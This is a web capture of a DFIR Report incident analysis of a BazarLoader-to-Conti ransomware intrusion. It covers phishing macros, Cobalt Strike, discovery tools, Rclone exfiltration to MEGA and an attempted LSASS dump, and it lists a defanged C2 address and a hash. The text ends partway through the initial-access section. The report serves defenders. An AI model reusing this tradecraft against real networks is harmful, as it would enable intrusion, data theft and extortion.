<!doctype html> <html lang="en-US"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>CONTInuing the Bazar Ransomware Story – The DFIR Report</title> <meta name='robots' content='max-image-preview:large' /> <style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style> <link rel='dns-prefetch' href='//stats.wp.com' /> <link rel='dns-prefetch' href='//c0.wp.com' /> <link rel="alternate" type="application/rss+xml" title="The DFIR Report » Feed" href="https://thedfirreport.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="The DFIR Report » Comments Feed" href="https://thedfirreport.com/comments/feed/" /> <script type="text/javascript"> /* <![CDATA[ */ window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/thedfirreport.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}}; /*! 
This file is auto-generated */ !function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof 
URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings); /* ]]> */ </script> <link rel='stylesheet' id='jetpack_related-posts-css' href='https://c0.wp.com/p/jetpack/14.0/modules/related-posts/related-posts.css' type='text/css' media='all' /> <style id='wp-emoji-styles-inline-css' type='text/css'> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 0.07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://c0.wp.com/c/6.7.1/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='mediaelement-css' href='https://c0.wp.com/c/6.7.1/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='wp-mediaelement-css' href='https://c0.wp.com/c/6.7.1/wp-includes/js/mediaelement/wp-mediaelement.min.css' type='text/css' media='all' /> <style 
id='jetpack-sharing-buttons-style-inline-css' type='text/css'> .jetpack-sharing-buttons__services-list{display:flex;flex-direction:row;flex-wrap:wrap;gap:0;list-style-type:none;margin:5px;padding:0}.jetpack-sharing-buttons__services-list.has-small-icon-size{font-size:12px}.jetpack-sharing-buttons__services-list.has-normal-icon-size{font-size:16px}.jetpack-sharing-buttons__services-list.has-large-icon-size{font-size:24px}.jetpack-sharing-buttons__services-list.has-huge-icon-size{font-size:36px}@media print{.jetpack-sharing-buttons__services-list{display:none!important}}.editor-styles-wrapper .wp-block-jetpack-sharing-buttons{gap:0;padding-inline-start:0}ul.jetpack-sharing-buttons__services-list.has-background{padding:1.25em 2.375em} </style> <style id='classic-theme-styles-inline-css' type='text/css'> /*! This file is auto-generated */ .wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none} </style> <style id='global-styles-inline-css' type='text/css'> :root{--wp--preset--aspect-ratio--square: 1;--wp--preset--aspect-ratio--4-3: 4/3;--wp--preset--aspect-ratio--3-4: 3/4;--wp--preset--aspect-ratio--3-2: 3/2;--wp--preset--aspect-ratio--2-3: 2/3;--wp--preset--aspect-ratio--16-9: 16/9;--wp--preset--aspect-ratio--9-16: 9/16;--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: 
#9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 
12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :is(*, div){margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) 
!important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) 
!important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) 
!important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;} :where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;} :where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;} :root :where(.wp-block-pullquote){font-size: 1.5em;line-height: 1.6;} </style> <link rel='stylesheet' id='freenews-style-css' href='https://thedfirreport.com/wp-content/themes/freenews/style.css?ver=6.7.1' type='text/css' media='all' /> <style id='freenews-style-inline-css' type='text/css'> .tags-links, .byline, .comments-link { clip: rect(1px, 1px, 1px, 1px); height: 1px; position: absolute; overflow: hidden; width: 1px; } </style> <link rel='stylesheet' id='font-awesome-css' href='https://thedfirreport.com/wp-content/themes/freenews/assets/library/fontawesome/css/all.min.css?ver=6.7.1' type='text/css' media='all' /> <link rel='stylesheet' id='freenews-google-fonts-css' href='https://thedfirreport.com/wp-content/fonts/d92fef3d9e5de6f7993b11046e265436.css' type='text/css' media='all' /> <link rel='stylesheet' id='sharedaddy-css' href='https://c0.wp.com/p/jetpack/14.0/modules/sharedaddy/sharing.css' type='text/css' media='all' /> <link rel='stylesheet' id='social-logos-css' href='https://c0.wp.com/p/jetpack/14.0/_inc/social-logos/social-logos.min.css' type='text/css' media='all' /> <script type="text/javascript" id="jetpack_related-posts-js-extra"> /* <![CDATA[ */ var related_posts_js_options = {"post_heading":"h4"}; /* ]]> */ </script> <script type="text/javascript" src="https://c0.wp.com/p/jetpack/14.0/_inc/build/related-posts/related-posts.min.js" id="jetpack_related-posts-js"></script> <script type="text/javascript" src="https://c0.wp.com/c/6.7.1/wp-includes/js/jquery/jquery.min.js" id="jquery-core-js"></script> <script type="text/javascript" 
src="https://c0.wp.com/c/6.7.1/wp-includes/js/jquery/jquery-migrate.min.js" id="jquery-migrate-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/js/global.js?ver=1" id="freenews-global-js"></script> <link rel="https://api.w.org/" href="https://thedfirreport.com/wp-json/" /><link rel="alternate" title="JSON" type="application/json" href="https://thedfirreport.com/wp-json/wp/v2/posts/4690" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://thedfirreport.com/xmlrpc.php?rsd" /> <meta name="generator" content="WordPress 6.7.1" /> <link rel="canonical" href="https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/" /> <link rel='shortlink' href='https://thedfirreport.com/?p=4690' /> <link rel="alternate" title="oEmbed (JSON)" type="application/json+oembed" href="https://thedfirreport.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fthedfirreport.com%2F2021%2F11%2F29%2Fcontinuing-the-bazar-ransomware-story%2F" /> <link rel="alternate" title="oEmbed (XML)" type="text/xml+oembed" href="https://thedfirreport.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fthedfirreport.com%2F2021%2F11%2F29%2Fcontinuing-the-bazar-ransomware-story%2F&format=xml" /> <!-- GA Google Analytics @ https://m0n.co/ga --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-162747485-1"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-162747485-1'); </script> <script type="text/javascript"> (function(url){ if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; } var addEvent = function(evt, handler) { if (window.addEventListener) { document.addEventListener(evt, handler, false); } else if (window.attachEvent) { document.attachEvent('on' + evt, handler); } }; var removeEvent = function(evt, handler) { if (window.removeEventListener) { 
document.removeEventListener(evt, handler, false); } else if (window.detachEvent) { document.detachEvent('on' + evt, handler); } }; var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' '); var logHuman = function() { if (window.wfLogHumanRan) { return; } window.wfLogHumanRan = true; var wfscr = document.createElement('script'); wfscr.type = 'text/javascript'; wfscr.async = true; wfscr.src = url + '&r=' + Math.random(); (document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr); for (var i = 0; i < evts.length; i++) { removeEvent(evts[i], logHuman); } }; for (var i = 0; i < evts.length; i++) { addEvent(evts[i], logHuman); } })('//thedfirreport.com/?wordfence_lh=1&hid=CFD06316AA709D608271209D9C944601'); </script> <style>img#wpstats{display:none}</style> <style type="text/css" id="custom-background-css"> body.custom-background { background-color: #f8f8f8; } </style> <!-- Jetpack Open Graph Tags --> <meta property="og:type" content="article" /> <meta property="og:title" content="CONTInuing the Bazar Ransomware Story" /> <meta property="og:url" content="https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/" /> <meta property="og:description" content="In this report we will discuss a case from early August where we witnessed threat actors utilizing BazarLoader and Cobalt Strike to accomplish their mission of encrypting systems with Conti ransomw…" /> <meta property="article:published_time" content="2021-11-29T02:19:21+00:00" /> <meta property="article:modified_time" content="2021-11-29T12:51:07+00:00" /> <meta property="og:site_name" content="The DFIR Report" /> <meta property="og:image" content="https://thedfirreport.com/wp-content/uploads/2021/11/f22784bc5813874c131d0c6f21acb3404084de7b57c0ae1f2afde6d8fe24c3a2.png" /> <meta property="og:image:width" content="709" /> <meta 
property="og:image:height" content="373" /> <meta property="og:image:alt" content="" /> <meta property="og:locale" content="en_US" /> <meta name="twitter:text:title" content="CONTInuing the Bazar Ransomware Story" /> <meta name="twitter:image" content="https://thedfirreport.com/wp-content/uploads/2021/11/f22784bc5813874c131d0c6f21acb3404084de7b57c0ae1f2afde6d8fe24c3a2.png?w=640" /> <meta name="twitter:card" content="summary_large_image" /> <!-- End Jetpack Open Graph Tags --> <link rel="icon" href="https://thedfirreport.com/wp-content/uploads/2020/04/cropped-dfir-v1-w-32x32.png" sizes="32x32" /> <link rel="icon" href="https://thedfirreport.com/wp-content/uploads/2020/04/cropped-dfir-v1-w-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon" href="https://thedfirreport.com/wp-content/uploads/2020/04/cropped-dfir-v1-w-180x180.png" /> <meta name="msapplication-TileImage" content="https://thedfirreport.com/wp-content/uploads/2020/04/cropped-dfir-v1-w-270x270.png" /> </head> <body class="post-template-default single single-post postid-4690 single-format-standard custom-background has-sidebar tags-hidden author-hidden comment-hidden"> <div id="page" class="site">
<div id="content" class="site-content"> <div class="site-content-cell"> <div class="wrap wrap-width"> <div id="primary" class="content-area"> <main id="main" class="site-main"> <article id="post-4690" class="post-4690 post type-post status-publish format-standard hentry category-adfind category-bazar category-cobaltstrike category-conti category-ransomware entry"> <div class="entry-content-holder"> <header class="entry-header"> <div class="entry-meta"> <span class="cat-links"> <a class="category-color-24" href="https://thedfirreport.com/category/adfind/">adfind</a> <a class="category-color-27" href="https://thedfirreport.com/category/bazar/">bazar</a> <a class="category-color-6" href="https://thedfirreport.com/category/cobaltstrike/">cobaltstrike</a> <a class="category-color-66" href="https://thedfirreport.com/category/conti/">conti</a> <a class="category-color-2" href="https://thedfirreport.com/category/ransomware/">ransomware</a> </span> </div><!-- .entry-meta --> <h1 class="entry-title">CONTInuing the Bazar Ransomware Story</h1> <div class="entry-meta"> <span class="posted-on"><a href="https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/" rel="bookmark"><time class="entry-date published" datetime="2021-11-29T02:19:21+00:00">November 29, 2021</time></a></span> </div><!-- .entry-meta --> </header><!-- .entry-header --> <div class="entry-content"> <div class="markdown"> <p>In this report we will discuss a case from early August where we witnessed threat actors utilizing <a href="https://thedfirreport.com/?s=BazarLoader" target="_blank" rel="noopener">BazarLoader</a> and <a href="https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/" target="_blank" rel="noopener">Cobalt Strike</a> to accomplish
their mission of encrypting systems with Conti ransomware.</p> <p>The usual set of discovery tools was used during this case, such as AdFind, Net, Ping, PowerView, and Nltest. Rclone was used to exfiltrate company data to MEGA, and Process Hacker was used in an attempt to dump LSASS. The threat actors executed a Conti batch file on a server which then encrypted most of the domain-joined systems.</p> <h2 id="case-summary">Case Summary</h2> <p>In August, we witnessed an intrusion that started from a BazarLoader infection. A phishing campaign distributing password-protected zip files containing weaponized documents to victims was the likely delivery source; password protection of this kind is commonly used to keep mail gateways and sandboxes from inspecting the archive contents. Macros inside the Word document extracted and executed a malicious .HTA file, which downloaded the BazarLoader DLL (masquerading as a .jpg) and executed it with regsvr32.</p> <p>It is now apparent to the information security community that intrusions starting with BazarLoader frequently end with Conti ransomware. This case saw such a conclusion. There are some evident similarities in cases that involve Conti ransomware: the operators’ tooling and the overall tasks performed tend to match across the cluster. When we look at our earlier <a href="https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks" target="_blank" rel="noopener">Conti case</a>, this becomes noticeable. This could be due to the widely circulated <a href="https://therecord.media/disgruntled-ransomware-affiliate-leaks-the-conti-gangs-technical-manuals/" target="_blank" rel="noopener">Conti manual</a> that was leaked by an affiliate. In this case, we saw the same pattern of events, with tools like net, nltest, and ShareFinder for discovery, Cobalt Strike for C2, and WMIC remote process creation for expanding their access within the network.</p> <p>Even though the intrusion lasted for five days in total, Cobalt Strike and hands-on-keyboard operators showed up within the first two hours of the intrusion. 
Straight away, they started gathering information to get the lay of the land using Net commands. Then they continued looking for open shares by executing the PowerView module, Invoke-ShareFinder.</p> <p>After collecting and dissecting the results from ShareFinder, they appeared to have a good understanding of the server and workstation layout of the organization as they started executing commands to gather information from specific, high-value servers. During that time, we saw errors when operators failed to alter specific parameters that indicate the operator is acting from a pre-defined playbook. They eventually decided to pivot laterally to a server using WMIC to execute a DLL Cobalt Strike beacon.</p> <p>Once they had access to the remote server via the Cobalt Strike beacon, they re-ran Invoke-ShareFinder and then exfiltrated data of interest from a different server using the Rclone application via the <a href="https://mega.io/">MEGA cloud storage service</a>.</p> <p>On the second day, the threat actors used RDP to access the backup server and in doing so, reviewed the backup settings, and running processes on the server via the taskmanager GUI.</p> <p>On day four, the threat actors returned and ran another round of exfiltration using Rclone and MEGA again.</p> <p>On the fifth day, they moved fast towards their final objective, which was Conti ransomware. Before executing Conti, they used RDP to install and configure the AnyDesk remote desktop application. Having GUI access, they attempted to use ProcessHacker to dump the LSASS process. After this last step, they deployed Conti ransomware via a batch script to all domain joined systems.</p> <p>One interesting fact about this case is that the threat actors were not seen interacting with the Domain Controllers (DCs). 
Most ransomware cases we see involve the threat actor executing code on the DCs.</p> <h3 id="services">Services</h3> <p>We offer multiple services including a <a href="https://thedfirreport.com/services/" target="_blank" rel="nofollow noopener">Threat Feed service</a> which tracks Command and Control frameworks such as Cobalt Strike, Metasploit, Empire, PoshC2, BazarLoader, etc. More information on this service and others can be found <a href="https://thedfirreport.com/services/" target="_blank" rel="nofollow noopener">here</a>.</p> <p>The Cobalt Strike servers in this case were added to the Threat Feed on 5/20/21 and 08/03/21</p> <p>We also have artifacts and IOCs available from this case such as pcaps, memory captures, files, event logs including Sysmon, Kape packages, and more, under our <a href="https://www.patreon.com/thedfirreport" target="_blank" rel="nofollow noopener">Security Researcher and Organization</a> services.</p> <h2 id="timeline">Timeline</h2> <p><img fetchpriority="high" decoding="async" class="alignnone size-full wp-image-4798" src="https://thedfirreport.com/wp-content/uploads/2021/11/CONTInuing-the-Bazar-Ransomware-Story1.png" alt="" width="1663" height="3328" srcset="https://thedfirreport.com/wp-content/uploads/2021/11/CONTInuing-the-Bazar-Ransomware-Story1.png 1663w, https://thedfirreport.com/wp-content/uploads/2021/11/CONTInuing-the-Bazar-Ransomware-Story1-150x300.png 150w, https://thedfirreport.com/wp-content/uploads/2021/11/CONTInuing-the-Bazar-Ransomware-Story1-512x1024.png 512w, https://thedfirreport.com/wp-content/uploads/2021/11/CONTInuing-the-Bazar-Ransomware-Story1-768x1536.png 768w, https://thedfirreport.com/wp-content/uploads/2021/11/CONTInuing-the-Bazar-Ransomware-Story1-1023x2048.png 1023w" sizes="(max-width: 1663px) 100vw, 1663px" /></p> <p>Analysis and reporting completed by <a href="https://twitter.com/Kostastsale" target="_blank" rel="noopener">@Kostastsale</a>, <a href="https://twitter.com/pigerlin" target="_blank" 
rel="noopener">@pigerlin</a>, and <a href="https://twitter.com/_pete_0" target="_blank" rel="noopener">@_pete_0</a></p> <p>Reviewed by @TheDFIRReport</p> <h2 id="mitre-attck">MITRE ATT&CK</h2> <h3 id="initial-access">Initial Access</h3> <p>Thanks to <a href="https://twitter.com/James_inthe_box" target="_blank" rel="noopener">@James_inthe_box</a> for the sample!</p> <blockquote class="twitter-tweet" data-width="550" data-dnt="true"> <p lang="de" dir="ltr">More fresh <a href="https://twitter.com/hashtag/bazaloader?src=hash&ref_src=twsrc%5Etfw">#bazaloader</a> via password'd zips -> doc:<a href="https://t.co/fP7WiT4KHL">https://t.co/fP7WiT4KHL</a></p> <p>dll drop hash:<br />d21908a90b44f440d80bb728ffc0893746df936aefd7440fcba447bf8f523184</p> <p>c2: https://161.35.147[.]110/out/run/text/plain <a href="https://t.co/aFZc9NznEi">pic.twitter.com/aFZc9NznEi</a></p> <p>— James (@James_inthe_box) <a href="https://twitter.com/James_inthe_box/status/1422572684953620481?ref_src=twsrc%5Etfw">August 3, 2021</a></p></blockquote> <p><script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></p> <p>As with previously documented intrusions, a weaponized Microsoft Word document is used to lure the user into enabling a macro to execute the payload. 
The user is presented with the following:</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/f22784bc5813874c131d0c6f21acb3404084de7b57c0ae1f2afde6d8fe24c3a2"><img decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/f22784bc5813874c131d0c6f21acb3404084de7b57c0ae1f2afde6d8fe24c3a2" alt="enter image description here" width="709" height="373" /></a></p> <p>Reviewing the file, we can observe that although it carries a .doc extension, its actual content is XML (the Word 2003 XML format shown below) — a mismatch between file extension and true file type that is itself a useful detection signal at the mail gateway or on the endpoint.</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/48fd9c86e04ef1a61d214e6e64ef7c41e6bd9a14221fa1d46971fef9324d2af8"><img decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/48fd9c86e04ef1a61d214e6e64ef7c41e6bd9a14221fa1d46971fef9324d2af8" alt="enter image description here" width="848" height="45" /></a></p> <p>A deeper inspection shows the Word 2003 XML formatting and the contained macro.</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/378c5988f8fc4afa0a81cabf543a41f1e299b701f952ad4077406bd2b7110731"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/378c5988f8fc4afa0a81cabf543a41f1e299b701f952ad4077406bd2b7110731" alt="enter image description here" width="650" height="983" /></a></p> <p>Once the macro has been enabled, in the next stage, an HTML Application (HTA) file is created and dropped into the user’s folder:</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/b7eb0f03b4298506d506b3212d1bcc69972e2706249a5b9e535f6ea28d43a323"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" 